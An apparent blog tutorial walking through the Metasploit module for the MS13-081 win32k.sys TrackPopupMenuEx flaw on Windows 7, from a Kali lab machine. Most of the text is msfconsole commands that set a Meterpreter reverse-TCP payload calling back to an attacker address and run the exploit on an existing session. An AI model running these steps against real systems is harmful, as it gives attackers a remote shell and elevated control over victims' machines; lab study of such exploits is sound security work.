This
Metasploit module exploits vulnerability in win32k.sys where under
specific conditions TrackPopupMenuEx will pass a NULL pointer to the
MNEndMenuState procedure. This Metasploit module has been tested
successfully on Windows 7 SP0 and Windows 7 SP1
Exploit Targets
Windows 7
Requirement
Attacker: Kali Linux
Victim PC: Windows 7
Now Open Kali terminal type msfconsole

msf exploit (ms13_081_track_popup_menu)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms13_081_track_popup_menu)>set lhost 192.168.1.6 (IP of Local Host)
msf exploit (ms13_081_track_popup_menu)>set session 1
msf exploit (ms13_081_track_popup_menu)>exploit


0 comments :
Post a Comment